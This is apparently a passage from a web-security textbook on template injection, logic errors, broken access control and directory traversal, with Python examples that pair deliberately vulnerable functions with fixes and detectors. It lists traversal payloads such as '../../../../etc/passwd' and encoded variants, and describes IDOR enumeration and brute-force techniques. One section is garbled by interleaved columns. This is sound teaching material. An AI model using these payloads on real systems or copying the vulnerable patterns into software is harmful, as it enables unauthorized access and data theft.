
Template injection is a powerful vulnerability that can be exploited to cause serious damage. By understanding how it works and how to protect yourself, you can ensure the security of your web applications and protect your users from malicious attacks.
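The difference between the fixed template "Hello, {{ user_name }}" and a template that has the user's input pasted into its source is the whole vulnerability, and the "whitelisting of allowed functions" item above is what limits the damage when the wrong pattern slips through. The following is an added example, not the book's code and not a real template engine: a deliberately tiny renderer in Python that accepts only plain variable names and an allowlist of filters, shown with the unsafe pattern (user input becomes template source) beside the safe one (user input is passed as data). The api_key value, the greeting templates and the filter list are constructed for the demonstration.

```python
import html
import re

# Toy engine: supports {{ name }} and {{ name|filter }}, nothing else.
PLACEHOLDER_RE = re.compile(r"\{\{\s*(.*?)\s*\}\}")
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
FILTERS = {"upper": str.upper, "lower": str.lower, "title": str.title}  # allowlist


class TemplateError(ValueError):
    pass


def render(template, context):
    """Expand placeholders. Anything that is not an allowlisted name or filter
    (arithmetic, attribute access, method calls) is rejected, never evaluated."""

    def substitute(match):
        expr = match.group(1)
        name, _, filt = expr.partition("|")
        name, filt = name.strip(), filt.strip()
        if not IDENT_RE.match(name):
            raise TemplateError("expression not allowed in template: %r" % expr)
        if name not in context:
            raise TemplateError("unknown variable: %r" % name)
        value = str(context[name])
        if filt:
            if filt not in FILTERS:
                raise TemplateError("filter not allowed: %r" % filt)
            value = FILTERS[filt](value)
        return html.escape(value)  # autoescape: data never becomes markup

    return PLACEHOLDER_RE.sub(substitute, template)


# Constructed: a secret that happens to live in the render context, the way
# framework configuration does in the Jinja2 {{ config.items() }} example above.
APP_CONTEXT = {"api_key": "EXAMPLE-KEY-NOT-REAL"}


def greet_vulnerable(user_input):
    """Anti-pattern: user input is concatenated into the template *source*,
    so any {{ ... }} the user types is parsed as template syntax."""
    template = "Hello, " + user_input + "!"
    return render(template, dict(APP_CONTEXT, user_name=user_input))


def greet_safe(user_input):
    """Correct pattern: the template is a fixed string written by the
    developer; the user's text only ever travels through the context."""
    return render("Hello, {{ user_name }}!", dict(APP_CONTEXT, user_name=user_input))
```

With the unsafe function a user named "{{ api_key }}" is greeted with the secret, which is exactly the information-disclosure outcome described above, while the allowlist is what stops "{{ 7*7 }}" from being evaluated; the safe function renders both inputs as literal text. A real engine such as Jinja2 evaluates far more than this toy does, so the first fix (never build template source from input) is the one that matters.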

2.11 - APPLICATION LOGIC ERRORS

Imagine you ask a friend to bring you a latte, but he comes back with an iced tea. There's nothing inherently wrong with the iced tea, but it wasn't what you wanted. In the software world, Application Logic Errors are like that unexpected iced tea: the application works, but not the way it should.

Application logic errors are flaws in the design or implementation of an application's business logic. Unlike syntax or runtime errors, which prevent the application from running, logic errors allow the application to run, but produce incorrect or unexpected results.

Why are Application Logic Errors Dangerous?

Although not always as obvious as a system failure, logic errors can have serious consequences:

- Financial losses: A logic error in an e-commerce system could allow users to purchase products at incorrect prices or without paying.
- Data leaks: A logic error in a user management system could allow users to access data they should not have access to.
- Reputational damage: A logic error in a voting system could lead to incorrect results, undermining confidence in the process.

Common Examples of Application Logic Errors

Logic errors can manifest themselves in many ways, but here are some common examples:

1. Incorrect Calculations: An error in the tax calculation formula could lead to incorrect taxes being charged to customers.
2. Insufficient Input Validation: If an application does not properly validate user input, an attacker could enter malicious data that causes unexpected behavior.
3. Incorrect Error Handling: If an application does not handle errors correctly, it could reveal sensitive information to attackers or fail unexpectedly.
4. Race Conditions: If two or more processes attempt to access or modify the same data at the same time, unexpected results may occur.

Finding and Correcting Application Logic Errors

Finding and correcting logic errors can be challenging, as they often do not manifest themselves as obvious errors. Here are some strategies that can help:

- Thorough Code Review: Carefully examine the source code for logic errors.
- Unit and Integration Testing: Create automated tests to verify that each component of the application works as expected.
- Black Box Testing: Test the application from the user's perspective, attempting to perform actions that could trigger logic errors.
- Monitoring and Logging: Record the behavior of the application and analyze the logs for patterns that may indicate logic errors.

Application logic errors are a silent but dangerous threat to the security and reliability of any software. By understanding how to identify and correct them, you can improve the quality of your application and protect your users from unexpected and potentially harmful results.


Advanced search

Unlike technical vulnerabilities such as XSS or SQL Injection, logic bugs are more difficult to detect and exploit, but can have a significant impact on the security and functionality of an application. This chapter explores how to identify and exploit logic errors in applications.

1. Understanding the Business Flow

- Goal: Understand how the application is supposed to work at each stage of the business process.
- Techniques:
  - Requirements Analysis: Review the application requirements documentation to understand the business rules and constraints.
  - Workflow mapping: Create flowcharts to visualize the different stages of the business process and how they interact with each other.
  - Functional testing: Perform manual or automated tests to verify that the application behaves as expected at each stage of the workflow.
- Example: Analyze the purchase process in an online store to understand how shopping carts, payments, shipments and order confirmations are handled.

2. Identifying Logic Error Patterns

- Objective: Recognize common patterns of logic errors that can occur in different types of applications.
- Common patterns:
  - Incorrect state handling: The application does not correctly validate or update the state of an object or process.
  - Insufficient input validation: The application does not properly verify the data entered by the user.
  - Incorrect calculations: The application performs erroneous calculations in prices, discounts, quantities, etc.
  - Inadequate access control: The application does not adequately restrict access to sensitive functions or data.
  - Privilege escalation: A user can perform actions that he/she should not be able to do.
  - Parameter manipulation: A user can modify application parameters to obtain undesired results.
- Example: Identifying a logic error in an online voting system that allows a user to vote multiple times.

3. Testing Techniques for Logic Errors

- Goal: Design and execute specific tests to uncover logic errors in the application.
- Techniques:
  - Black box testing: Test the application without knowing its source code, focusing on the inputs and outputs of the system.
  - Gray box testing: Use partial knowledge of the source code to design more specific tests.
  - White box testing: Analyze the source code to identify possible logic errors.
  - Fuzzing: Send random or unexpected inputs to the application to detect anomalous behavior.
  - Traffic analysis: Inspect network traffic between client and server to identify inconsistencies or unexpected data.
- Example: Performing black box testing on an online banking application to verify if it is possible to transfer money to an invalid account.

4. Logic Error Exploitation

- Goal: Exploit identified logic errors to gain unauthorized access, manipulate data, or cause other negative impacts on the application.
- Techniques:
  - Parameter manipulation: Modify HTTP request parameters to bypass security controls or access restricted functions.
  - Malicious data injection: Send unexpected or malicious data to the application to cause errors or unwanted behavior.
  - Brute force attacks: Attempt different combinations of inputs to find valid values to bypass security controls.
- Example: Exploiting a logic error in an e-commerce application that allows products to be purchased at a lower price than the actual price.

Ethical and Legal Considerations

Searching for and exploiting logic errors must be done in a responsible and ethical manner. It is important to obtain proper permission before testing on third-party applications and to avoid causing damage or disruption.
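Several of the patterns in this chapter and the previous one (incorrect calculations, insufficient input validation, parameter manipulation, and the e-commerce example of buying at a lower price than the actual price) come down to one mistake: the server trusts values the client sent. The following is an added example, not the book's code, written in Python: a checkout that trusts a client-supplied unit_price and an unvalidated quantity, beside one that recomputes the order from a server-side catalog and rejects out-of-range input. The catalog, prices, tax rate and quantity limit are constructed assumptions.

```python
from decimal import Decimal, ROUND_HALF_UP

# Constructed server-side catalog: prices are authoritative here, never in the request.
CATALOG = {
    "sku-100": Decimal("49.99"),
    "sku-200": Decimal("5.00"),
}
TAX_RATE = Decimal("0.21")   # constructed rate
MAX_QUANTITY = 100           # constructed business limit per line item


class InvalidOrder(ValueError):
    pass


def checkout_vulnerable(items):
    """Anti-pattern: the unit price comes from the client and the quantity is
    never validated, so a tampered request changes what gets charged. A
    negative quantity on one line even turns the order into a credit."""
    subtotal = 0.0
    for item in items:
        subtotal += item["unit_price"] * item["quantity"]
    return round(subtotal * 1.21, 2)


def checkout_fixed(items):
    """Recompute the order from server-side data and reject anything outside
    the business rules instead of silently 'correcting' it."""
    subtotal = Decimal("0")
    for item in items:
        sku = item.get("sku")
        qty = item.get("quantity")
        if sku not in CATALOG:
            raise InvalidOrder("unknown product %r" % sku)
        # bool is a subclass of int in Python, so it is excluded explicitly
        if not isinstance(qty, int) or isinstance(qty, bool) or qty < 1 or qty > MAX_QUANTITY:
            raise InvalidOrder("invalid quantity %r for %r" % (qty, sku))
        subtotal += CATALOG[sku] * qty   # any client-sent unit_price is ignored
    total = subtotal * (1 + TAX_RATE)
    # Decimal with explicit rounding: money arithmetic in binary floats is a
    # calculation error of its own
    return total.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)
```

The fixed version answers the "parameter manipulation" test from this chapter directly: the request may carry any unit_price it likes and the total does not change, and a quantity of -20 or "2" is an error rather than a discount.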


Bypass Protection

Application logic vulnerabilities are errors in the design or implementation of an application that an attacker can exploit to bypass security protections and gain unauthorized access or perform unwanted actions. These errors are often more difficult to detect than traditional technical vulnerabilities because they require a deep understanding of how the application works and how its various components interact.

Types of Application Logic Errors

- Authorization Errors: These occur when an application does not properly verify whether a user has permission to perform a specific action. For example, an attacker could modify the URL of a protected resource to access it without authentication.
- Access Control Errors: These allow an attacker to access resources or functionality to which he/she should not have access. For example, an attacker could manipulate the parameters of a request to view another user's confidential information.
- Input Validation Errors: Occur when an application fails to properly validate user-supplied data, allowing an attacker to inject malicious code or manipulate the application's behavior.
- State Handling Errors: Occur when an application does not properly manage the state of a session or transaction, allowing an attacker to manipulate the flow of the application or perform unauthorized actions.
- Calculation Errors: Occur when an application performs incorrect calculations, allowing an attacker to manipulate prices, quantities or other important values.

Exploitation Examples of Application Logic Errors

- Parameter Manipulation: An attacker modifies the parameters of an HTTP request (e.g., in the URL or in a form) to bypass access restrictions or perform unauthorized actions.
- Brute Force Attacks: An attacker attempts to guess passwords, verification codes or other secret values by sending multiple requests.
- Replay Attacks: An attacker captures a legitimate request and replays it multiple times to perform an unauthorized action.
- Privilege Escalation Attacks: An attacker exploits an authorization error to gain access to restricted functions or data.
- Denial of Service (DoS) attacks: An attacker exploits a logic error to overload the application and make it inaccessible to legitimate users.

How to Detect and Prevent Application Logic Bugs

- Code Analysis: Review source code for logic errors, such as incorrect authorization checks or miscalculations.
- Penetration Testing: Perform security testing to simulate attacks and discover application logic vulnerabilities.
- Design Review: Analyze application design to identify potential weaknesses in business logic.
- Threat Modeling: Identify potential threats and design the application to mitigate them.
- Input Validation: Validate all data provided by the user to ensure that it is secure and complies with the application requirements.
- Error Handling: Implement proper error handling to prevent attackers from obtaining sensitive information from error messages.
- Role-Based Access Control: Implement granular access control to ensure that users can only access the resources and functions to which they are entitled.
- Security Auditing: Conduct periodic security audits to identify and correct application logic vulnerabilities.

Detecting and preventing application logic errors is an ongoing challenge that requires a multidisciplinary approach and a combination of tools and techniques. By understanding the different types of logic errors and how to exploit them, developers and security professionals can build more secure and resilient applications.

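The state-handling and replay errors listed above, and the race condition from the start of this chapter (the voting system that lets a user vote twice, the purchase completed without paying), share one shape: a check and the action it guards are not atomic, so two requests ar-riving together both pass the check. The following is an added example, not the book's code, in Python: a withdrawal whose balance check and deduction can interleave, forced into the worst interleaving with a barrier so the result is reproducible, beside the same operation done under a lock. The account, its balance and the two-request scenario are constructed.

```python
import threading


class Account:
    """Constructed account used to show a check-then-act race condition."""

    def __init__(self, balance):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw_unsafe(self, amount, rendezvous=None):
        """State-handling error: the check and the deduction are separate steps,
        so two concurrent requests can both see enough balance. `rendezvous`
        is a test hook (a threading.Barrier) that pins both threads between the
        two steps so the lost update happens every time, not just under load."""
        if self.balance >= amount:          # check ...
            if rendezvous is not None:
                rendezvous.wait()           # both threads are here before either deducts
            self.balance -= amount          # ... act
            return True
        return False

    def withdraw_safe(self, amount):
        """Check and act under one lock: the second request sees the updated
        balance. In a real system this is a database row lock or a conditional
        UPDATE ... WHERE balance >= amount, not an in-process lock."""
        with self._lock:
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False


def run_concurrently(fn, n):
    """Run fn(i) in n threads and return the results in thread order."""
    results = [None] * n

    def worker(i):
        results[i] = fn(i)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def demo_double_spend(safe):
    """Two simultaneous withdrawals of the entire balance.
    Returns (number of withdrawals that succeeded, final balance)."""
    account = Account(100)
    if safe:
        results = run_concurrently(lambda i: account.withdraw_safe(100), 2)
    else:
        barrier = threading.Barrier(2)
        results = run_concurrently(lambda i: account.withdraw_unsafe(100, barrier), 2)
    return results.count(True), account.balance
```

The unsafe path reports two successful withdrawals and a balance of -100; the locked path reports one success and a balance of 0. The same structure applies to "has this user already voted?" and "has this coupon already been redeemed?": the check is only meaningful if the state it reads cannot change before the action commits.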
2.12 - BROKEN ACCESS CONTROL (BAC)

Imagine if a bank had no security guards and no safes. Anyone could walk in and take whatever money they wanted. In the digital world, Broken Access Controls are the equivalent of leaving the bank door wide open.

Access controls are the security measures that determine who can access what resources on a system. When these controls fail, attackers can exploit these vulnerabilities to access sensitive information, modify data or even take control of entire systems.

While I love the challenge of finding vulnerabilities of all kinds, I have to admit that broken access controls have a special place in my heart. In fact, I consider them my personal gold mine.

In my nearly ten-year career, these little glitches in system security have brought me more joy (and profit) than any other type of bug. Why? Because they're like finding an open back door at Fort Knox. Once you find it, it's like being given the keys to the kingdom. You can access confidential information, manipulate data at will, and even take control of entire systems. It's a hacker's dream, isn't it?

Why are access controls important?

Access controls are critical to protect the integrity, confidentiality and availability of data and systems. Without them, anyone could:

- Access confidential information: Such as financial data, medical records or trade secrets.
- Modify or delete data: Wreaking havoc on critical systems or stealing valuable information.
- Perform unauthorized actions: Such as transferring money, changing passwords or deleting user accounts.

Common Access Control Vulnerabilities

1. Insecure Direct Object Reference (IDOR): An attacker manipulates the parameters of a request to access objects to which he should not have access. For example, changing the user ID in a URL to view another user's data.

Example:

https://sitio.com/perfil?usuario=123

An attacker could change the user value to another number to view another user's profile.

2. Authentication and Authorization Failures: An attacker can bypass authentication or authorization mechanisms to gain access to restricted areas of a system. This can occur due to weak passwords, unsecured sessions or failures in authorization logic.

3. Incorrect Security Configuration: Access permissions may be misconfigured, allowing unauthorized users to access sensitive files or directories.

Example: A configuration file with read permissions for all users could reveal confidential information, such as database passwords.

4. Lack of Role Verification: A system may not properly verify user roles, allowing a user with a lower role to perform actions that should only be allowed for higher roles.

Mitigating Access Control Vulnerabilities

To protect against vulnerabilities in access controls, it is crucial to implement the following best practices:

- Principle of Least Privilege: Grant users only the permissions necessary to perform their tasks.
- Strong Authentication and Authorization: Implement strong authentication and authorization mechanisms, such as strong passwords, two-factor authentication and role-based access controls.
- Input Validation: Always validate and sanitize user input to prevent IDOR attacks.
- Code Review and Security Testing: Perform comprehensive code reviews and security testing to identify and correct vulnerabilities.
- Monitoring and Logging: Monitor access logs to detect suspicious activity and respond quickly to potential security incidents.

Broken access controls are one of the most common and dangerous vulnerabilities in web applications and systems. Protecting access controls is essential to ensuring the security of your data and systems. By implementing security best practices, you can significantly reduce the risk of attacks and protect your organization from financial loss and reputational damage.
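The IDOR example above (changing usuario=123 in the URL) is closed by checking, on every request, that the requester owns the object or holds a role entitled to it, and the "Monitoring and Logging" item becomes concrete once those decisions are recorded: a client whose denied requests walk through many different IDs is the sequential-identifier enumeration that the next chapter describes under "Force Enumeration". The following is an added example, not the book's code, in Python: a profile lookup with an object-level authorization check that records each decision, plus a detector over that record. The users, profiles, the client address 203.0.113.7 and the threshold of three distinct IDs are constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class User:
    id: int
    role: str   # "user" or "admin" (constructed role model)


# Constructed data: profiles keyed by the predictable numeric ID the URL example uses.
PROFILES = {
    123: {"name": "alice", "email": "alice@example.test"},
    124: {"name": "bob", "email": "bob@example.test"},
    125: {"name": "carol", "email": "carol@example.test"},
}


class ProfileService:
    def __init__(self):
        # Audit record of every decision: (client, requester_id, target_id, outcome)
        self.audit_log = []

    def get_profile(self, requester, target_id, client="0.0.0.0"):
        """Object-level authorization: being logged in is not enough. The
        requester must own the object or hold a role allowed to read any profile."""
        profile = PROFILES.get(target_id)
        allowed = profile is not None and (
            requester.id == target_id or requester.role == "admin"
        )
        self.audit_log.append((client, requester.id, target_id, "allow" if allowed else "deny"))
        if not allowed:
            # One error for "not yours" and "does not exist", so the response
            # itself does not reveal which IDs exist (see Response Analysis below)
            raise PermissionError("profile %d not accessible" % target_id)
        return profile


def detect_enumeration(audit_log, threshold=3):
    """Return clients whose denied requests span at least `threshold` distinct
    object IDs: the signature of walking /user/1, /user/2, /user/3 ..."""
    denied_ids = defaultdict(set)
    for client, _requester_id, target_id, outcome in audit_log:
        if outcome == "deny":
            denied_ids[client].add(target_id)
    return sorted(c for c, ids in denied_ids.items() if len(ids) >= threshold)
```

The authorization decision lives next to the data access rather than in the URL routing, so it cannot be skipped by finding a second route to the same object; the detector runs over the same audit record, which is the cheapest place to notice an IDOR hunt while it is still in progress.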


Advanced Search

Access control is a fundamental component of the security of any web application. When this control fails, attackers can gain unauthorized access to restricted functions, data or resources. This chapter delves into techniques and strategies for finding broken access control vulnerabilities, also known as "IDOR" (Insecure Direct Object Reference) or "BAC" (Broken Access Control).

What is Broken Access Control?

Broken access control occurs when an application fails to properly verify whether a user has permission to access a specific resource. This can happen due to:

- Direct object references: The application uses predictable identifiers (such as ID numbers) to access resources, allowing attackers to manipulate them to access data that does not belong to them.
- Lack of authorization verification: The application does not verify whether the user has the necessary permissions before granting access to a resource.
- Incorrect configuration: Access permissions are misconfigured, giving users more privileges than they should have.

Techniques for Finding Broken Access Control

1. Parameter Analysis: Examine HTTP request parameters for object identifiers (such as user ID, product ID, etc.). Attempt to manipulate these parameters to see if resources that should not be available can be accessed.
- Example: Changing the user ID in a URL to try to view another user's profile.

2. Test Roles and Privileges: Create user accounts with different roles and privileges to see if you can access functions or data restricted to higher roles.
- Example: Trying to access the administration section with a normal user account.

3. Force Enumeration: Try to access resources with sequential identifiers to see if they exist and if they can be accessed without authorization.
- Example: Try accessing URLs such as /user/1, /user/2, /user/3, etc.

4. Response Analysis: Watch server responses for sensitive information that may reveal details about resources or users that should not be accessed.
- Example: Look for usernames, email addresses or financial data in the responses.

5. Automated Tools: Use web vulnerability scanning tools that can help identify broken access control issues.
- Example: OWASP ZAP, Burp Suite.

Examples of Broken Access Control

- Access to other users' data: An attacker can change the user ID in a URL to view another user's requests.
- Access to administrative functions: A normal user can access administrative functions by changing a parameter in a request.
- Access to confidential files: An attacker can download confidential invoices or reports by manipulating the parameters of a URL.

Broken Access Control Prevention

- Strict authorization verification: Always verify that the user has the necessary permissions before allowing access to a resource.
- Avoid direct object references: Use random identifiers or session tokens instead of predictable identifiers.
- Input validation: Validate all user input to prevent parameter tampering.
- Principle of least privilege: Grant users only the permissions necessary to perform their tasks.

Bypass protection

Access control is a fundamental component of web application security. However, when these controls are flawed, attackers can find ways to bypass them and gain access to resources, functions or data to which they should not have access. This chapter explores the techniques and strategies that attackers use to overcome weak access control protections.

1. Identifying Access Controls

Before attempting to circumvent access controls, it is crucial to identify how they are implemented in the web application. Common mechanisms include:

- Authentication: Verification of user identity (e.g., through login).
- Authorization: Determining user permissions and privileges (e.g., user roles).
- Access Control Lists (ACLs): Rules that define which users or groups can access which resources.
- Input Validation: Verification that the data provided by the user is valid and secure.

2. Evasion Techniques

Once access controls have been identified, attackers can employ various techniques to circumvent them:

into an input field to bypass authentication and gain access to the database.
- Request Forgery (CSRF): An attacker sends a malicious link to an authenticated user who, upon clicking on it, performs an undesired action, such as changing their email address.
- Privilege Escalation Attacks: An attacker exploits a vulnerability in a forum to become a moderator and delete other users' posts.

Escalating the attack

Access control is a cornerstone of web application security. When this mechanism fails, attackers can exploit these vulnerabilities to gain unauthorized access to restricted functions, data or resources. This chapter delves into how attackers can escalate their privileges and cause significant impact by exploiting flawed access controls.

1. Identification of Faulty Access Controls

1. Objective: Find weaknesses in an application's access con
trol implementation.
- Parameter Manipulation: Modifying the parameters of 2. Techniques:
a request (e.g., in the URL or in the body of a POST request) - Manual scanning: Examine the application's source code,
to access restricted resources. configuration, and behavior to identify inconsistencies or
- Brute Force Attacks: Testing different combinations of cre lack of permissions checking.
dentials or parameter values to find those that grant access. - Automated scanning: Use automated scanning tools.
- Command Injection: Attempting to inject malicious Security analysis to detect common patterns of faulty access
commands into the application to bypass access restrictions. control.
- Request Forgery (CSRF): Tricking an authenticated user - Penetration testing: Attempting to access restricted func
into performing unwanted actions on your behalf. tions without proper authorization to verify if controls are
- Privilege Escalation Attacks: Exploiting vulnerabilities to functioning properly.
gain higher privileges and access restricted resources.
Examples:
3. Examples of Evasion - IDOR (Insecure Direct Object Reference): Manipulating
URL parameters or hidden fields to access other users'
- Parameter Manipulation: An attacker modifies the "role" resources.
parameter in a request to change his role from "user" to - Lack of role verification: Accessing administrative func
"administrator" and gain access to administrative functions. tions without having the role of administrator.
- Brute Force Attacks: An attacker uses a script to try thou - Object enumeration: Discovering hidden or not directly
sands of passwords to find the correct one and gain access referenced resources.
to a protected account.
- Command Injection: An attacker injects an SQL command

web vulnerabilities 107


Automate the attack

Automating attacks against this type of vulnerability can reveal systematic weaknesses and scale up the identification of vulnerable entry points. This chapter explores how to automate attacks on faulty access control, from reconnaissance to exploitation.

Automated Reconnaissance

1. Objective: Identify functions and resources potentially vulnerable to access control problems.
2. Tools:

- Web crawlers: Collect the URLs and parameters of a web application, mapping its structure. Examples: Burp Suite Spider, ZAP Spider.
- Vulnerability scanners: Search for known patterns of faulty access control, such as IDOR (Insecure Direct Object Reference) or lack of role verification. Examples: OWASP ZAP, Burp Suite.
- Traffic analysis: Inspect HTTP traffic to identify requests to protected resources and analyze the server's responses. Examples: Burp Suite Proxy, Wireshark.
- Example: Use a web crawler to discover all the URLs of a web application and then use a vulnerability scanner to check each page for faulty access control patterns.

Automated Parameter and Role Analysis

1. Objective: Identify parameters that can be manipulated to access unauthorized resources, and verify the implementation of roles and permissions.
2. Tools:

- Param Miner: Burp Suite extension that discovers hidden parameters in URLs and forms for further analysis.
- Autorize: Burp Suite extension that replays the requests of one session with the cookies of a lower-privileged session and reports responses that should have been denied, to verify whether access controls are implemented correctly.
- Custom scripts: Develop scripts to automate parameter manipulation and role verification.
- Example: Use Param Miner to extract all the parameters of a web application and then use a custom script to modify parameter values and verify whether restricted resources can be accessed.

Brute Force and Enumeration Attacks

1. Objective: Test different parameter values or identifiers to discover hidden resources or access confidential information.
2. Tools:

- Burp Suite Intruder: Automates the injection of payloads into parameters to perform brute force and enumeration attacks.
- Wfuzz: Fuzzes URL and form parameters to discover hidden resources.
- Custom scripts: Develop scripts to automate the enumeration of identifiers or parameter values.
- Example: Use Burp Suite Intruder to iterate over a user ID parameter and attempt to access other users' profiles.

Automated Exploitation

1. Objective: Exploit the identified access control flaws to access restricted resources, modify data or perform unauthorized actions.
2. Tools:

- Exploitation frameworks: Automate tasks such as parameter modification, privilege escalation and execution of malicious actions. Examples: Metasploit, Burp Suite.
- Custom scripts: Develop scripts to automate exploitation in specific scenarios.
- Example: Use a custom script to modify an order ID in an e-commerce application and change the shipping address to an address controlled by the attacker.
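The check that Autorize and the custom scripts in this section automate, together with the server-side fix the prevention list earlier in the chapter asks for, as an added example in Python (not code from the book, from Burp Suite or from Autorize). The two handlers, the users alice, bob and carol, the invoice records and the probe list are all constructed for the demo; a real run would replace the in-process handlers with HTTP requests carrying each account's session cookie.

```python
"""Broken access control: an Autorize-style replay check against a vulnerable
and a fixed handler. Added example; the application, users and data below are
constructed, not taken from any real system."""
from dataclasses import dataclass, field
from urllib.parse import urlencode

# Constructed fixtures: two ordinary users and one administrator.
ROLES = {"alice": "user", "bob": "user", "carol": "admin"}
INVOICES = {101: {"owner": "alice", "total": 120.0},
            102: {"owner": "bob", "total": 80.0}}


@dataclass(frozen=True)
class Request:
    path: str
    params: dict = field(default_factory=dict)
    public: bool = False          # endpoints meant to be readable by anyone

    def label(self) -> str:
        return f"{self.path}?{urlencode(self.params)}" if self.params else self.path


def vulnerable_app(req: Request, session_user: str):
    """Looks objects up by the client-supplied id without checking ownership
    (IDOR) and trusts a client-supplied 'role' parameter for the admin page."""
    if req.path == "/invoice":
        inv = INVOICES.get(int(req.params.get("id", 0)))
        return (200, inv) if inv else (404, None)
    if req.path == "/admin/users":
        return (200, sorted(ROLES)) if req.params.get("role") == "admin" else (403, None)
    if req.path == "/catalog":
        return (200, ["widget", "gadget"])
    return (404, None)


def fixed_app(req: Request, session_user: str):
    """Same routes, but every decision is derived from the authenticated
    session: the owner check for objects, the stored role for admin pages."""
    role = ROLES[session_user]
    if req.path == "/invoice":
        inv = INVOICES.get(int(req.params.get("id", 0)))
        if inv is None:
            return (404, None)
        if inv["owner"] != session_user and role != "admin":
            return (403, None)    # the authorization check the vulnerable app lacks
        return (200, inv)
    if req.path == "/admin/users":
        return (200, sorted(ROLES)) if role == "admin" else (403, None)
    if req.path == "/catalog":
        return (200, ["widget", "gadget"])
    return (404, None)


def find_broken_access(app, attacker: str, probes) -> list:
    """Replays each (privileged_user, request) pair with the attacker's
    session. A private request that succeeds for the privileged user and
    returns the identical response to the attacker is a finding."""
    findings = []
    for privileged_user, req in probes:
        expected = app(req, privileged_user)
        observed = app(req, attacker)
        if req.public or expected[0] != 200:
            continue                       # nothing worth comparing
        if observed == expected:
            findings.append(req.label())
    return findings


PROBES = [
    ("alice", Request("/invoice", {"id": "101"})),           # alice's own invoice
    ("carol", Request("/admin/users", {"role": "admin"})),   # admin page
    ("alice", Request("/catalog", public=True)),             # public, never a finding
]

if __name__ == "__main__":
    for name, app in (("vulnerable", vulnerable_app), ("fixed", fixed_app)):
        print(name, find_broken_access(app, "bob", PROBES))
```

The vulnerable handler reports both private probes because bob's session receives exactly what alice's and carol's did; the fixed handler reports nothing, while bob can still read his own invoice and carol, as administrator, can read everyone's. Public endpoints are excluded up front, which is the same triage step a tester performs in Autorize to keep identical responses on public pages from showing up as findings.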

Automated Monitoring and Alerting

1. Purpose: Receive real-time notifications when a flawed access control vulnerability is discovered or an exploitation attempt is detected.
2. Tools:

- Intrusion Detection Systems (IDS): Monitor network traffic for attack patterns related to faulty access control. Examples: Snort, Suricata.
- Web Application Firewall (WAF): Blocks suspicious requests that may indicate an exploitation attempt.
- Example: Configure a WAF to block requests that attempt to access protected resources without proper authorization. A WAF can only recognize generic patterns (identifier enumeration, tampered role parameters); it does not know who owns which object, so it supplements the application's own authorization checks rather than replacing them.

Ethical and Legal Considerations

Automating attacks against faulty access control must be done responsibly and ethically. It is critical to obtain proper permission before testing third-party systems and to avoid causing damage or disruption.


2.13 - DIRECTORY TRAVERSAL #2.13

Imagine you are exploring a building and find a secret door that leads to restricted areas. In the digital world, Directory Traversal (or "Path Traversal") is the equivalent of that secret door, allowing attackers to access files and directories outside the web root folder.

In essence, Directory Traversal is a vulnerability that arises when a web application fails to properly validate user input, allowing it to manipulate the path to a file or directory. This can result in reading, and in some cases even modifying or deleting, sensitive files on the server.

Why is Directory Traversal Dangerous?

Directory Traversal is a serious threat to the security of any web application. An attacker exploiting this vulnerability can:

- Steal sensitive information: Access configuration files, credentials, customer data, etc.
- Execute malicious code: When the traversed path is passed to an include() or combined with a file upload, load and execute scripts on the server, potentially taking control of the system.
- Deface the website: Modify or delete files, causing damage to the company's reputation.

How Directory Traversal Works

The root of the problem lies in the way web applications handle file paths. If an application does not properly validate and canonicalize user input, an attacker can insert special sequences, such as "../" (dot-dot-slash), to navigate through the file system.

For example, if a web application uses the following URL to display an image:

https://sitio.com/mostrar_imagen.php?archivo=imagen.jpg

An attacker could attempt to modify the URL as follows:

https://sitio.com/mostrar_imagen.php?archivo=../../../../etc/passwd

If the application does not validate the input, it could end up displaying the contents of the /etc/passwd file, which contains information about the system's users.

Examples of Directory Traversal Payloads

Attackers use a variety of payloads to exploit Directory Traversal vulnerabilities. Some common examples include:

- ../ (dot-dot-slash): Navigates one level up in the directory tree.
- ....// (four dots and two slashes): Bypasses filters that strip the first occurrence of "../"; after the removal, "../" remains.
- ..%2f (dot-dot, percent 2f): URL-encodes the slash so that filters matching the literal "../" do not detect it.
- ..%c0%af (dot-dot, percent c0, percent af): Encodes the slash as an overlong UTF-8 sequence, which some lenient decoders have historically accepted.

Mitigating Directory Traversal

To protect against Directory Traversal, it is crucial to implement the following security measures:

- Input validation: Never trust user input. Always validate and sanitize any data that is used to construct file paths.
- Whitelisting: Instead of trying to block all malicious input, keep an allowlist of permitted files or directories.
- Indirect file references: Map user-supplied names or indexes to server-side paths, so that user input never becomes part of a file system path. (Parameterized queries, a related technique, address SQL injection rather than traversal.)
- Software updates: Keep your software up to date to fix known vulnerabilities.
- Security testing: Perform periodic penetration tests to identify and fix vulnerabilities before attackers find them.

Directory Traversal is a common but dangerous vulnerability that can have serious consequences for the security of your web application. By understanding how it works and how to mitigate it, you can protect your data and systems from attackers.

Remember, security is an ongoing process. You should always be on the lookout for new threats and update your defenses accordingly.

Advanced search

The "Directory Traversal" vulnerability (also known as "Path Traversal") allows an attacker to access files and directories outside the web root directory. This can lead to exposure of sensitive information, execution of malicious code and other security risks. This chapter explores how to identify and exploit these vulnerabilities, as well as best practices to prevent them.

Understanding Directory Traversal

1. Concept: An attacker manipulates the path of a requested file to access files outside the web root directory.

2. Examples:
- http://example.com/../../etc/passwd
- http://example.com/images/../admin/config.php
(Browsers and most web servers normalize "../" in the URL path itself, so in practice the sequences are placed in a parameter value, as in the download.php example below.)

3. Impact:
- Reading of confidential files (passwords, API keys, etc.).
- Execution of malicious code (if the server allows file uploads).
- Access to restricted directories.

Identifying Vulnerabilities

1. Manual analysis:
- Review source code for functions that handle file paths (e.g., include, require, fopen).
- Test URL parameters and form fields with traversal sequences (e.g., ../, ....//).

2. Automated tools:
- Vulnerability scanners: Look for known Directory Traversal patterns. Examples: Nikto, OWASP ZAP.
- Fuzzers: Send malicious inputs to parameters to test whether they are vulnerable. Examples: Wfuzz, ffuf.

Exploiting Vulnerabilities

File reading:
- Attempt to access known files (e.g., /etc/passwd, config.php).
- Use brute force techniques to discover hidden files.

Code execution:
- If the server allows file uploads, attempt to upload a malicious file (e.g., a PHP script) and then reach it through Directory Traversal.

Prevention

Input validation:
- Strictly filter and sanitize all user input used to construct file paths.
- Validate that the resolved file path is within the web root directory.

